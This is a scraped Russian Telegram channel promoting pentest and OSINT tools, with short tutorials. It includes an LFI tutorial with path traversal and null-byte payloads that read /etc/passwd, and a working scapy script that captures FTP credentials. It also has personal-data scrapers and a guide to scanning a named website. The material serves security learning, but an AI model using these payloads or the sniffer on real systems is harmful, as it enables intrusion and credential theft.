Kali Linux
53.6K subscribers
1.04K photos
74 videos
13 files
1.08K links
@linux_kal наш чат

По всем вопросам- @workakkk

@ai_machinelearning_big_data - машинное обучение

@itchannels_telegram - 🔥 главные ресурсы для хакера

@programming_books_it - бесплатные it книги

@pythonl -🐍

РКН: clck.ru/3Fmszy
Download Telegram
🛠 OSINT Toolkit

Веб-приложение полного стека, объединяющее множество инструментов и сервисов для аналитиков безопасности в единый инструмент.

Github

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
10👍6🔥3
⚡️Маст-хэв список для программистов, каналы с последними книжными новинками, библиотеками, разбором кода и актуальной информацией, связанной с вашим языком программирования.
Лучший способ получать свежие обновлении и следить за трендами в разработке.

Python: t.me/pythonl
C#: t.me/csharp_ci
C/C++/ t.me/cpluspluc
Машинное обучение: t.me/ai_machinelearning_big_data
Data Science: t.me/data_analysis_ml
Devops: t.me/devOPSitsec
Go: t.me/Golang_google
Базы данных: t.me/sqlhub
Rust: t.me/rust_code
Javascript: t.me/javascriptv
React: t.me/react_tg
PHP: t.me/phpshka
Android: t.me/android_its
Мобильная разработка: t.me/mobdevelop
Linux: t.me/+A8jY79rcyKJlYWY6
Big Data: t.me/bigdatai
Хакинг: t.me/linux_read
Java: t.me/javatg

💼 Папка с вакансиями: t.me/addlist/_zyy_jQ_QUsyM2Vi
Папка Go разработчика: t.me/addlist/MUtJEeJSxeY2YTFi
Папка Python разработчика: t.me/addlist/eEPya-HF6mkxMGIy

🎞 YouTube канал: https://www.youtube.com/@uproger

😆ИТ-Мемы: t.me/memes_prog

🇬🇧Английский: t.me/english_forprogrammers
Please open Telegram to view this post
VIEW IN TELEGRAM
6👍2🔥2
🗡Методы атак на SaaS

Коллекция методов атак на SaaS-системы.

Software-as-a-Service (сокращенно SaaS — «ПО как услуга») — это программное обеспечение, приобретая которое, пользователь оплачивает не стоимость продукта, а период использования. Самый известный пример SaaS — Netflix: вы покупаете подписку и смотрите фильмы

Предназначен для исследователей безопасности, "красных/синих" команд и специалистов по тестированию на проникновение с целью ознакомления и обмена информацией о методах атак на SaaS.

#infosec #pentesting #redteam

GIthub

@linuxkalii
👍103🔥2
🚀 Local File Inclusion
LFI
- это возможность использования и выполнения локальных файлов на серверной стороне. Уязвимость позволяет удаленному пользователю получить доступ с помощью специально сформированного запроса к произвольным файлам на сервере, в том числе содержащую конфиденциальную информацию.

Проще говоря, это уязвимость открытия файлов с сервера + недостаточная фильтрация, что позволяет открывать произвольный файл.

Поиск file inclusion
Вначале разберемся как определить параметры которые отвечают за инклуд файлов.

Поиск параметров
Для поиска параметров есть два варианта: автоматический или ручной поиск.

Автоматический поиск
Автоматический поиск можно осуществить тем же spider'ом в burpsuite. Вы можете у нас в вики найти статью burpsuite.

Ручной поиск
Предположим, что мы нашли GET параметр:

http://site.ru/folder/index.php?file=gallery
Подставим под параметр строку 'index':

http://site.ru/folder/index.php?file=index
Если у вас открылся какой то из файлов index.(любое расширение), находящихся на сайте, то тут мы уже однозначно можем утверждать, что файл отвечает за подкачку файла.

Именно такие параметры нам и нужны.

Определение фильтров
После того, как мы получили список параметров, нужно проверить, есть ли у них фильтрация.

Нулевая фильтрация
Попробуем подкачать файлы, которые не рассчитывали показывать.

Аналогом такого файла в Linux является файл /etc/passwd

(В данном случае за строку с параметром мы взяли http://site.ru/folder/index.php?file=index.html)

Попробуем его подкачать:

http://site.ru/folder/index.php?file=/../../../../../../etc/passwd
Объясняю что происходит - переход в папку /../ означает поднятие по иерархии вверх (точнее это уязвимость path traversal). Т.к. папка etc лежит в корневой папке, то мы должны ее достичь угадыванием: то есть чем чаще мы поднимаемся вверх, тем выше шанс, что мы окажемся в корневой папке (то мы должны написать несколько раз /../).

Если файл показался. То считайте, что вы нашли LFI. В этом случае фильтр вообще отсутствует.

Нулевой байт
В данном случае за строку с параметром мы взяли http://site.ru/folder/index.php?file=index, то есть с отсутствующим окончанием.
Но даже при отсутствии фильтра могут быть проблемы. Например в конце параметра может приписываться окончание.

Например с запросом /../../../../../../etc/passwd может преобразоваться в

/../../../../../../etc/passwd.php
Но и на этот раз есть вариант исправить строку.В старых версиях PHP остался такой недостаток, как Null Byte Injection.
Один из них - это приписывание нулевого байта. Параметры, при передаче по http, зашифровываются в url шифрование. И в этой кодировке нулевой байт выглядит именно в %00.

А т.к. в PHP и многих других языках чтение строки идет именно до нулевого байта, то мы можем приписать его в середину строки, чтобы следующая часть строки отбрасывалась.

В данном случае если мы впишем в параметр /../../../../../../etc/passwd.php%00, то получим следующую строку:

http://site.ru/folder/index.php?file=/../../../../../../etc/passwd%00
И строка в памяти сервера будет выглядеть как:

/../../../../../../etc/passwd%00.php ==> /../../../../../../etc/passwd
И в итоге мы смогли отбросить окончание и получить нужный файл.

String limit

Еще один вариант отбрасывания окончания возможен при String Limit - укорачиванию строки.
И какая же от этого польза? А что если мы отбросим часть строки с окончанием, то получится нужная нам строка,но уже без окончания.

🍀LFI FINDER

@linuxkalii
👍193🔥2🥰1
This media is not supported in your browser
VIEW IN TELEGRAM
🔎 Uscrapper: Веб-парсер OSINT

Uscrapper 2.0 – это надежный OSINT-парсер, предназначенный для эффективного сбора разнообразной персональной информации с веб-сайтов.

Uscrapper использует методы веб-парсинга и регулярные выражения для извлечения адресов электронной почты, ссылок на социальные сети, имен авторов, геолокации, номеров телефонов и имен пользователей из гиперссылочных и негиперссылочных источников на веб-странице, поддерживает многопоточность для ускорения этого процесса.

Uscrapper 2.0 оснащен передовыми модулями обхода анти-парсинга и поддерживает технологии для извлечения информации из всех ссылок в пределах одного домена. Кроме того, в программе предусмотрена возможность создания отчета, содержащего все извлеченные данные.

Требования:
Python 3
модуль pip
Стабильное подключение к Интернету

Процесс установки
Клонируйте репозиторий инструмента следующим образом
После клонирования перейдите в только что загруженный каталог и измените режим работы “install.sh”, чтобы предоставить полный доступ к инструменту.
git clone https://github.com/z0m31en7/Uscrapper.git
cd Uscrapper/install/
chmod +x ./install.sh && ./install.sh #For Unix/Linux systems

После этого можно приступать к работе с инструментом.

Github
Пример работы

@linuxkalii
🔥18👍85🤬1
This media is not supported in your browser
VIEW IN TELEGRAM
WebPalm - это мощный инструмент командной строки на GO для создания карт веб-сайтов и веб-скреппинга. Благодаря рекурсивному подходу он может создать полное дерево всех веб-страниц и ссылок на них на сайте.

Он также может извлекать данные из тела каждой страницы с помощью регулярных выражений, что делает его идеальным инструментом для веб-скрейпинга и извлечения данных.

go install github.com/XORbit01/webpalm@latest

Github

@linuxkalii
👍18🔥64
🖥 Awesome Android Security

Список материалов и ресурсов по безопасности Android, предназначенных для пентестеров и охотников за ошибками.

🖥 Github

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍112🔥2😢1
🦄 Работа с сканером Unicornscan на Kali Linux

Специалисты ИБ используют различные инструменты сканирования. Один из самых популярных, но довольно медленных — Nmap или Masscan (самый быстрый сканер портов), но он не такой точный. Сегодня мы дополним инструментарий маст-хев сканеров тулзой Unicornscan. Далее покажу, как использовать Unicornscan на Kali Linux.

Использование сканера Unicornscan на Kali Linux
Если вам нужен достаточно быстрый, но в тоже время точный сканер, попробуйте установленный в Kali Linux сканер Unicornscan.

Что такое Unicornscan.
Unicornscan — это асинхронный сканер (в отличие от синхронного Nmap). Поэтому он работает намного быстрее.

Ключевые особенности Unicornscan

Unicornscan — это попытка создать распределенный стек TCP/IP на территории пользователя. Хотя в настоящее время он имеет сотни отдельных функций, основной набор способностей включает в себя:

Асинхронное сканирование TCP.
Асинхронный захват баннера TCP.
Асинхронное сканирование UDP.
Активная и пассивная удаленная идентификация ОС, приложений и компонентов путем анализа ответов.
Регистрация и фильтрация файлов PCAP.
Вывод реляционной базы данных.
Поддержка пользовательских модулей.
Настраиваемые представления наборов данных.
Имеет свой стек TCP/IP, отличительную особенность, отличающую его от других сканеров портов.

Сканирование с помощью Unicornscan
Сканер установлен в полной версии Kali Linux. Если вы используете урезанную версию, вот как его установить:

sudo apt-get install unicornscan
Сначала мы начнем с простого сканирования. Для выполнения базового сканирования, используйте команду:

sudo unicornscan 192.168.112.57

Для примера, в качестве жертвы я использую уязвимую машину Metasploitable. На скрине видно, что при простом сканировании перечислены все открытые TCP-порты. Это похоже на сканирование -Ss в NMap.

Для сканирования несколько хостов, используйте команду:

sudo unicornscan 192.168.112.57 192.168.102.100
Можно использовать инструмент на сайте, установив интервал 30 пакетов в секунду (параметр -r30) и добавив сканирование TCP (параметр -mT):

sudo unicornscan -r30 -mT adaptercart.com

Для сканирования UDP используйте параметр -mU:

sudo unicornscan -r300 -mU 192.168.112.57
Unicornscan сканирование UDP портов

Полученный результат можно сохранить в файл PCAP, для этого используйте параметр -w добавив имя файла (в моем случае — udpports):

sudo unicornscan -r300 -mU 192.168.112.57 -w udpports.pcap
Файл будет сохранен в домашний каталог.

Unicornscan сохраненный файл PCAP

Это основное использование Unicornscan. Для более детального изучения стоит открыть справку:

sudo unicornscan -h
Теперь вы знаете, как сканировать хост или сайт с помощью Unicornscan на Kali Linux.

@linuxkalii
👍183🔥2
🖥 Перехват FTP-пароля с помощью Python

Сниффер учетных данных FTP (File Transfer Protocol) – это инструмент, который перехватывает сетевой трафик и перехватывает учетные данные FTP (имя пользователя и пароль), используемые для аутентификации доступа к FTP-серверу.

Важно отметить, что использование FTP в качестве средства передачи данных считается небезопасным, поскольку при этом учетные данные и другая информация передаются по сети в открытом виде, что может быть легко перехвачено злоумышленниками с помощью инструментов сниффинга.

Для защиты FTP-соединений рекомендуется использовать безопасные альтернативы, такие как SFTP (SSH File Transfer Protocol) или FTPS (FTP over SSL/TLS).

from typing import Protocol
import sys
from scapy.layers import inet
from scapy.all import *
from scapy.layers import *
import psutil
import scapy.all as scapy
from scapy.layers import http
linea = '--------------------------------------------------'
class bcolors:
OK = '\033[92m' #GREEN
WARNING = '\033[93m' #YELLOW
ladrrr = '8GY.'
ss = 'OWQ1'
FAIL = '\033[91m' #RED
pinocho_chocho = 'y!c'
RESET = '\033[0m' #RESET COLOR
def ftp_creds(p_ftp):
if p_ftp[TCP].dport == 21:
data = p_ftp.sprintf("%Raw.load%")
if "USER" in data:
global ip_ftp
global ip_ftp2
ip_ftp = "'FTP IP: ", p_ftp[IP].dst, "'"
print(ip_ftp)
global user_ftp
data = data.split(" ")
data = data[1]
global user_ftp2
user_ftp = "'User: ", data, "'"
print(user_ftp)
elif "PASS" in data:
data = data.split(" ")
data = data[1]
global passwd_ftp
global passwd_ftp2
passwd_ftp = "'PASSWORD: ", data,"'"
print(passwd_ftp)
print(linea)
global ftp_ip_final
global user_ftp_final

def ftp():
print(linea)
print(f"{bcolors.WARNING}Your Network Interfaces{bcolors.RESET}")
addrs = psutil.net_if_addrs()
cc = str(addrs.keys())
interfaces = print(cc[9:])
bb = input("Choose Interface to use: ")
xs = 0
if bb in cc:
try:
while xs>=0:
print(linea)
print(f"{bcolors.WARNING}Searching...{bcolors.RESET}")
ftp_pkt = sniff(filter='tcp and port 21',iface=bb,prn=ftp_creds)

except KeyboardInterrupt:
print(f"{bcolors.FAIL}You cancelled with Ctrl+C{bcolors.RESET}")
print(linea)
global ftphost
global ftpuser
global ftpass
ftp()

Данный код представляет собой скрипт на языке Python, выполняющий сниффинг пакетов FTP (File Transfer Protocol) с целью извлечения информации об имени пользователя и пароле.

Скрипт начинается с импорта нескольких модулей, включая Protocol из библиотеки typing, sys, inet из scapy.layers, scapy.all и http из scapy.layers. Также определяется пользовательский класс bcolors, используемых для вывода информации на терминал.

Далее определяется функция ftp_creds, которая принимает параметр p_ftp, представляющий собой перехваченный FTP-пакет. Если порт назначения пакета равен 21 (FTP-порт по умолчанию), то функция извлекает исходные данные пакета, а если в этих данных содержится команда “USER” или “PASS”, то извлекается соответствующее имя пользователя или пароль соответственно. Эти значения сохраняются в глобальных переменных и выводятся на терминал.

Далее определяется функция ftp. Она выводит на терминал некоторые инструкции и предлагает пользователю выбрать сетевой интерфейс, который будет использоваться для прослушивания пакетов. Затем функция запускает бесконечный цикл, в котором с помощью функции Scapy’s sniff перехватывает FTP-пакеты на выбранном интерфейсе. Каждый пакет передается в функцию ftp_creds для извлечения информации об имени пользователя и пароле. Если пользователь прерывает цикл нажатием клавиш Ctrl+C, то функция печатает сообщение на терминал.

Наконец, вызывается функция ftp для запуска процесса анализа пакетов.

📌Подробнее

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍165🔥5
This media is not supported in your browser
VIEW IN TELEGRAM
🖥 pdlist. A passive subdomain finder

Сборщик поддоменов, написанный на python. Этот инструмент можно эффективно использовать для сбора информации о домене, не посылая ни одного пакета ни на один из узлов сайта.

git clone https://github.com/gnebbia/pdlist
cd pdlist
pip install -r requirements.txt
python setup.py install

Github

#infosec #pentesting #bugbounty

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
17🔥4👍1
👺 Nac Bypass Agent

Python скрипт, который принимает от пользователя информацию, необходимую для изменения IP и MAC-адреса, запуска инструментов responder и tcpdump, а также инструмента nbtscan.

Github

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
11👍9🔥5
🖥 Список популярных утечек с GitHub: Анализ репозиториев компаний

Целью данного исследования было изучение файлов, которые компании могли случайно загрузить на GitHub, и выявление конфиденциальной информации, которая могла присутствовать в загруженных проектах; основное внимание уделялось популярным компаниям в области технологического консалтинга, финансов, программного обеспечения, маркетинга, информационной безопасности, кибербезопасности, телекоммуникаций с высоким числом коммитов.

Что касается методики и процесса изучения аккаунтов GitHub, то на начальных этапах исследования подготовили 91 поисковый запрос к GitHub для выявления конфиденциальных данных, которые могли быть размещены на GitHub.

Затем авторы определили список публичных репозиториев из отобранной выборки соответствующих компаний. Затем провели поиск на странице расширенного поиска GitHub, включив в него репозитории компаний.

При изучении репозиториев GitHub авторы столкнулись с большим количеством секретных ключей, паролей и других конфиденциальных данных. Случайное раскрытие этих данных свидетельствует о потенциальных рисках безопасности, с которыми могут столкнуться компании, неосознанно раскрывающие свою ценную информацию на таких публичных платформах, как GitHub.

📌 Статья

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
10👍7🔥3
🔍 netspionage: утилита сетевой криминалистики

netspionage — это инструмент командной строки (CLI) созданный для проведения разведки и обнаружения атак в сети.

Скрипт на Python для работы используются: scapy, pandas, requests и т. д.

# clone the repo
git clone https://github.com/ANG13T/netspionage.git

# change the working directory to netspionage
cd netspionage

# install the requirements
pip3 install -r requirements.txt


Github

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍139🔥3🥰2👏1
🚀 OWASP Maryam

OWASP Maryam - это модульный фреймворк с открытым исходным кодом, основанный на OSINT и сборе данных. Он предназначен для создания надежной среды для быстрого и тщательного сбора данных из открытых источников и поисковых систем.

$ pip install maryam

Github

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍117🔥3🥰2
🏆 CFTZone 2023: отборочные соревнования по этичному хакингу

Соревнования были проведены партнером Сбера – компанией по управлению цифровыми рисками BI.ZONE 12-13 августа. В онлайн-турнире участвовали 1326 команд из 117 стран мира — были выбраны 10 победителей этапа, которые сразятся в финале в ноябре 2023 года.

Тройка лучших команд получит $10 тыс., $5 тыс. и $3 тыс. соответственно. В квалификационном этапе нужно было решить 26 заданий в 7 категориях. В финал прошли команды из России, Индонезии, Китая, Южной Кореи, Чехии и Франции.

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥1510👍2😁2👎1
🏄 Анонимность Parrot Security с помощью AnonSurf

AnonSurf
- скрипт AnonSurf, который предназначен для включения службы Tor и перенаправления всего трафика, в том числе DNS запросов, через анонимную сеть Tor.

При запуске AnonSurf также предлагает закрыть программы, которые могут угрожать вашей анонимности.

Это хороши инструмент для анонимизации трафика. Он позволяет перенаправлять весь трафик через сеть TOR. Вы, наверное, слышали о TOR раньше или даже использовали для анонимного серфинга в браузер TOR. Но в отличие от браузера TOR, который анонимизирует только веб-трафик, Anon Surf анонимизирует весь трафик через сеть TOR.

Запустить AnonSurf очень просто.
Запустим команду traceroute для сайта Google:

traceroute www.google.de

Вывод покажет, что весь трафик направляется через собственный маршрутизатор и DNS-сервер своего интернет-провайдера.

Теперь запустим Anon Surf и снова попробуем ту же команду traceroute.

Запуск AnonSurf Parrot Security
Для запуска Anon Surf, откройте терминал и выполните команду:

sudo anonsurf
Или откройте Aplications (Меню приложений) и выберите Anon Surf —> Anonsurf Start.

Вам будет предложено ввести пароль root, и вас спросят, хотите ли вы остановить приложения, которые могут вас деанонимизировать. Нажмите Yes.

С этого момента вы перешли анонимный режим. Давайте проверим трафик еще раз:

traceroute www.google.de

Теперь вы можете просматривать страницы анонимное.

Остановка AnonSurf Parrot Security
Чтобы остановить AnonSurf, откройте Aplications (Меню приложений) и выберите Anon Surf —> Anonsurf Stop.

Как вы можете видеть из меню, в меню также есть возможность проверить внешний IP-адрес (check IP), прежде чем включать режим анонимности, чтобы убедиться, что он действительно изменился. Вы также можете изменить выходной узел Tor (change exit node).

kali-anonstealth

@linuxkalii
👍1711🔥3
💀 Seekr

Универсальный набор инструментов для сбора и управления OSINT-данными с удобным веб-интерфейсом.

Seekr позволяет объединить все ваши любимые OSINT-инструменты в одном. Бэкэнд написан на языке Go с использованием BadgerDB в качестве базы данных и предлагает широкий спектр возможностей для сбора, управления и анализа данных.

git clone https://github.com/seekr-osint/seekr
cd seekr
go generate ./...
tsc --project web
go run main.go

Github

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍9🔥31
This media is not supported in your browser
VIEW IN TELEGRAM
🕵️Eyes - инструмент OSINT для получения существующих учетных записей из электронной почты

Eyes умеет не только находить существующие на разных сайтах аккаунты, но и находить сам аккаунт (с помощью определенных модулей), даже если профиль не имеет ничего общего с электронной почтой!

$ git clone https://github.com/N0rz3/Eyes.git
$ cd ./Eyes
$ pip3 install -r requirements.txt


Github

@linuxkalii
👍187🔥3😁1